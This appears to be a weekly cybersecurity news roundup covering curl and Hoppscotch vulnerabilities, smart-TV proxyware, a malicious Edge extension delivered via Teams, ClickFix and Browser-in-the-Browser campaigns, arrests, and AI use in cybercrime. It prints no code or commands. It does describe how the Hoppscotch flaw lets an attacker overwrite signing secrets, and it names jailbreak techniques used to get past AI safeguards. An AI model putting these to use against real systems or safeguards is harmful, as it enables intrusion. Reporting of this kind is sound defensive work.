It’s dumb out there again.
This week has the usual smell of prod on fire and nobody wanting to admit who left the door open — old creds still working, trusted apps doing sketchy crap, browser tricks jumping the fence, and “normal” workflows turning into phishing pipes because apparently email was not enough hell already.
The worst part is how cheap some of it feels. Not elite. Not cinematic. Just stale secrets, fake updates, lazy trust, and random boxes quietly becoming someone else’s infrastructure. Same internet, fresh headache. Let’s get into it.
-
Privacy-first bot defense
Cloudflare has teamed up with Google Chrome, Microsoft Edge, and Mozilla Firefox to create a privacy-preserving protocol that websites can use to separate desirable web traffic from undesirable network requests. This involves the use of Private Access Control Tokens (PACT), which allow websites to issue anonymous tokens that assert a given browsing session is being run by a human. "A user's browser can then provide these tokens to other sites to prove that a human is in the loop, reducing the need for annoying and clunky captchas or invasive tracking," Cloudflare
said. "PACT is designed so that sites cannot leverage it to track or identify users or their browsing history."
-
Six curl CVEs
AISLE said it
discoveredsix vulnerabilities in curl, which range from "classic memory-lifetime issues to logic bugs in how libcurl decides whether a connection, credential, or host identity is still valid." One of the notable vulnerabilities is CVE-2026-8932, which allows the library to "reuse a previously created connection even when some mTLS config-related option had been changed that should have prohibited reuse." AISLE described it as the oldest curl vulnerability reported so far, adding that it has been shipped in releases since curl version 7.7, which was released on March 22, 2001. The identified flaws have been addressed in version 8.21.0.
-
Unauthenticated takeover
A critical security flaw has been disclosed in self-hosted versions of Hoppscotch(CVE-2026-50160, CVSS score: 10.0), an open source API platform, that can result in complete compromise. Offgrid Security's autonomous AI security agent, Kiro, has been
creditedwith discovering the bug. "The POST /v1/onboarding/config endpoint allows an unauthenticated attacker to inject arbitrary InfraConfig keys -- including JWT_SECRET and SESSION_SECRET -- into the database via mass assignment," the project maintainers said. "These keys are not declared in the SaveOnboardingConfigRequest DTO, but because the NestJS ValidationPipe does not strip extra properties, they pass through to the service layer, where Object.entries(dto) iterates all keys without restriction." A successful exploitation leads to full server compromise and persistent access that survives password resets. OffGrid Security told The Hacker News that four independent weaknesses are combined to allow an unauthenticated attacker to overwrite the JWT signing key in a single HTTP request, and the exploit requires no credentials. The issue has been fixed in hoppscotch-backend version 2026.5.0.
-
Proxyware in smart TVs
A new report from Spur Intelligence has
revealedthat more than one-third of LG and Samsung smart TV apps it reviewed contain proxywarethat can relay third-party traffic through the TV owner's internet connection with users' consent. The company said it scanned 6,038 apps across LG webOS and Samsung Tizen and found 2,058 that contain residential proxy software. This includes clocks, screensavers, games, fish tanks, and other low-utility apps. On LG webOS, 42.5% of apps carried such code. On Samsung Tizen, the rate was 26.9%. Across both platforms, it reached 34.1%. Bright Data, Massive, and Oxylabs take up the top three SDK providers for webOS and Tizen. "Smart TVs are almost ideal proxy hosts. They sit on the same home network as everything else, but they do not feel like computers, so people rarely audit them like computers," Spur said. "There is no battery drain to notice, no cellular bill to spike, no app switcher full of suspicious background activity. A TV can stay plugged in, signed in, and online for years while the user thinks of it as furniture." The threat intelligence firm said this dynamic also changes the consent equation, as users may not realize what it actually means to sell access to their residential IP address. "Technically, these applications are compliant with gaining consent based on how they inform the user," Spur CTO Alastair Parr told The Hacker News. "However, there is often no verification that the user is either of age or authorized to provide consent on the device. The reality is that there are likely many smart TVs scattered across office spaces and residential homes, quietly part of these networks, without the responsible owners' awareness or consent." Amazon's Device and System Abuse Policyexplicitly bars apps that facilitate proxy services for third parties. Similar protections have been enabledby Roku as well. However, LG and Samsung are yet to enforce an equivalent policy.
-
Edgecution via Teams
An initial access broker (IAB) affiliated with Payouts King ransomware has been observed masquerading as IT personnel in social engineering attacks conducted via Microsoft Teams to deliver a malicious Microsoft Edge browser extension dubbed Edgecution. "The technique utilizes a malicious Microsoft Edge browser extension that exploits the Chrome native messaging protocol to interact with host-native applications beyond the confines of the browser sandbox," Zscaler ThreatLabz
said. "By abusing this interface, the attackers gain direct host access, enabling them to manipulate the local filesystem, launch processes, and execute arbitrary code on the compromised host." The malware has two components: a Microsoft Edge browser extension named "Edge Monitoring Agent" that beacons to a command-and-control (C2) server and relays host-based commands to a Python-based backdoor, which can collect system information, enumerate running processes, provide filesystem access, and execute arbitrary Python code and shell commands. The extension will be invisible to a user as it's loaded in a headless Microsoft Edge browser. A similar attack chain involving a Chromium-based extension codenamed SNOWBELTwas detailed by Google-owned Mandiant in April 2026.
-
Legacy credential breach
Competitive intelligence company Klue has revealed that a credential dating back to 2022, which was used as part of a limited pilot, was exploited by the
Icarus extortioniststo steal Salesforce data from its corporate customers, including several cybersecurity companies. In a statement shared with TechCrunch, the company saidthe credential was "originally provided to a third-party in 2022, for a limited pilot." Klue did not share specifics about the purpose of the pilot, the duration for which it ran, or the identity of the third-party to whom the company gave the credentials. It's also unclear why the credential wasn't revoked immediately, assuming the pilot had concluded. Questions remain about how the attackers managed to acquire this legacy credential in the first place. A number of companies have come forward to confirm they have had limited Salesforce information stolen during the attack, including 8x8, BeyondTrust, Gong, Jamf, HackerOne, Insurity, LastPass, OneTrust, Pendo, Recorded Future, Snyk, Sprout Social, and Tanium.
-
State-crime convergence
NCC Group said it has found growing evidence of nation-state actors
increasingly leveragingtools and tactics traditionally associated with financially motivated cybercrime to disguise their espionage and intelligence-gathering operations, blurring the line between the two sets of activities. "Historically, organisations could draw a relatively clear distinction between ransomware attacks driven by financial gain and nation-state operations designed to support strategic objectives. That distinction is becoming increasingly difficult to make," Matt Hull, VP of Cyber Intelligence and Response at NCC Group, said. "What we're seeing is a convergence of criminal and state-backed activity. Threat actors are sharing infrastructure, adopting common tooling and, in some cases, deliberately operating behind established ransomware brands to obscure attribution and delay response efforts."
-
Admin reset alerts
Google said it's expanding the existing "Super Admin password reset" alert into a broader Admin password reset alert in
Alert Center. "Previously, this rule only triggered alerts when a super admin's password was changed," the company said. "With this update, the alert will now cover password resets for all administrator roles within your organization. This update provides admins with better visibility and control over the security of their organization's privileged accounts. Monitoring password changes for all admin roles provides a higher level of oversight to respond more quickly to potential account compromises or unauthorized changes." The change is applicable to all Google Workspace customers.
-
ClickFix targets macOS
A new ClickFix campaign has been
observedtricking users into copying malicious commands and pasting them to the Terminal app that silently downloads and mounts a malicious DMG file. The disk image file contains a self-signed information stealer that can harvest a user's system password, data from web browsers, wallets, messaging apps, and Keychain, exfiltrate the data, set up LaunchAgent persistence, and tamper with Ledger Live and Trezor Suite installations by replacing legitimate components to hijack cryptocurrency wallet information. The stealer is assessed to belong to the Atomic macOS Stealer (AMOS) lineage, particularly a variant called Odyssey, per Palo Alto Networks Unit 42. The development comes as the cybersecurity company detailedanother multi-step ClickFix attack that employs techniques like brandsquatting to deliver a cross-platform trojan with browser-credential stealing, remote shell, live screen streaming, keylogger, file manager, and SSH tunneling capabilities.
-
TfL hackers convicted
Thalha Jubair, 20, from East London, and Owen Flowers, 18, from Walsall, have been
convictedin the U.K. for orchestrating a cyber attack on Transport for London (TfL) in 2024, costing $38.2 million in losses. The two defendants, who were members of the online criminal collective known as Scattered Spider, were arrestedlast September but pleaded not guiltyto their crimes during a court appearance in November 2025. They are now scheduled for sentencing on July 16, 2026. "Scattered Spider is a prolific criminal group that engages in data extortion and other criminal activities, utilizing social engineering techniques and SIM swap attacks, to obtain credentials, install remote access tools, and/or bypass multi-factor authentication," the U.S. Federal Bureau of Investigation (FBI) said.
-
Marketplace admin extradited
Abdellah Belmili (aka Dila Belmili or SPOX), a 26-year-old Algerian national, has been arrested, charged, and extradited from Spain to the U.S. on charges of conspiracy to commit bank fraud. SPOX is alleged to have acted as an administrator for a cybercrime marketplace ("www.market0day[.]com") as well as created phishing kits that have been used to compromise major U.S. financial institutions. "Between September and November 2020, Belmili advertised the marketplace and facilitated some of the customer support for the marketplace on his personal Telegram channel @SpoxCoder," the U.S. Justice Department
said. "In late December 2020, after several customers complained that they had not received their purchases from www.market0day[.]com, Belmili replied that he was no longer the administrator, and instead had opened up a new marketplace – www.spoxy[.]us, advertising the new marketplace – www.spoxy.us, advertising the new marketplace as a 'new store for bulk SMS.' 'Bulk SMS' typically refers to sending phishing or other fraudulent messages via text message." Approximately 5,600 U.S. and international victims have been identified.
-
Collaboration phishing
A new phishing campaign is abusing Outlook Groups and Microsoft 365 collaboration features to "make malicious activity appear routine," Fortra said. The attack involves adding targets to an attacker-controlled Microsoft 365 group and then using the group mailbox, shared files, or fake calendar invites (aka CalPhishing) to facilitate credential theft, token capture, or malware delivery. "The technique shifts malicious intent away from a single phishing email into a trusted productivity workflow," the company
said. "A user may see what looks like a normal group addition, internal update, shared resource, or calendar item before being pushed toward an action."
-
AI in cybercrime
A new analysis from Sophos has
revealedthat AI has emerged as a hot button topic in underground communities, as threat actors debate its potential for malware and tool development, while some express concerns about the technology reducing work opportunities. This includes posts selling API keys for generative AI tools, advertising solutions that can enhance social engineering, AI-enabled malware (e.g., ApexAI, Metatron, and PolyEngine), discussing jailbreaks for public AI models to bypass censorship and other safeguards using techniques like role-play framing, multi-stage prompting, and contextual manipulation, and offers to hire or partner with prompt engineers. Threat actors have also discussed the use of public AI assistants for intrusion activity, as well as marketed a tool called Leak Bazaar that claims to use AI to triage and sift through mountains of stolen data before it can be packaged and exchanged with other threat actors. Not all have embraced AI with open arms, however, with some outlining skepticism and worries about how the rise of AI could "reshape roles, pricing, and competitive advantage within the cybercrime economy."
-
8,500 REDCap instances
Censys has
uncoveredjust over 8,500 REDCap instances globally as of June 16, 2026, with most of them located in the U.S., the U.K., Germany, and Australia. REDCap, short for Research Electronic Data Capture, is a web application used by research institutions globally to hold clinical trial data, participant records, and other sensitive research information. Last week, Google Threat Intelligence Group (GTIG) attributed a year-plus espionage campaign against North American academic, medical, and military research institutions to UNC6508, a China-nexus actor. The intrusion set leveraged internet-facing REDCap servers as an initial access vector to deploy a backdoor called INFINITERED to exfiltrate sensitive data. Exactly how these servers are hacked is unconfirmed. The earliest known compromise dates to September 2023.
-
Surveillance export gaps
A report from Human Rights Watch has
revealedthat a Bulgaria-based surveillance technology firm named Circles sold its tools to countries that were likely to use them for repression or to commit serious human rights violations. Documents describe licenses for exports of Circles' technology to Azerbaijan, Bahrain, Brazil, Dominican Republic, El Salvador, Ghana, Guatemala, Israel, Jordan, Malaysia, Mexico, Morocco, Panama, Serbia, and the U.A.E. Clients included intelligence services, military and police bodies, regional governments, and private companies, Human Rights Watch said. That said, it's currently not known whether the technology was actually exported. "Nonetheless, issuing the licenses demonstrates a major flaw in how individual governments implement E.U. export controls for surveillance technology," the non-profit said. "The controls are intended to limit exports of surveillance technology to destinations where there is a likelihood it could be used to violate rights, and to provide transparency about what exports take place."
-
BitB malware lures
A campaign that impersonates popular software brand names has
leveragedthe Browser-in-the-Browser ( BitB) technique to distribute malicious payloads by means of a reusable phishing kit. It makes use of a draggable pop-up with a spoofed URL to serve a fake software update warning. "The campaign uses social engineering to trick victims into downloading and manually executing a malicious installer (e.g., an .exe payload)," Unit 42 said. "The pages simulate a stalled document load and present an 'out of date' software error." Earlier this month, Unit 42 discloseddetails of a second BitB campaign involving at least 10 unique domains that was used to steal Microsoft 365 credentials using a draggable, OS/browser-fingerprinted pop-up with a spoofed OAuth URL. In this attack, victims who click a Microsoft sign-in button are presented with what appears to be a standard login page designed to harvest credentials.
If there’s a theme here, it’s that attackers do not need magic when the boring crap still works — forgotten creds, lazy trust, fake updates, loose admin paths, and users getting nudged into doing the dangerous part themselves. The future is here, somehow, and it still smells like a misconfigured staging box.
Patch what you can. Revoke what you forgot. Maybe glance at the devices you’ve been treating like furniture. See you next ThreatsDay, assuming the internet hasn’t found an even dumber way to catch fire by then.
<small>Source: The Hacker News</small>
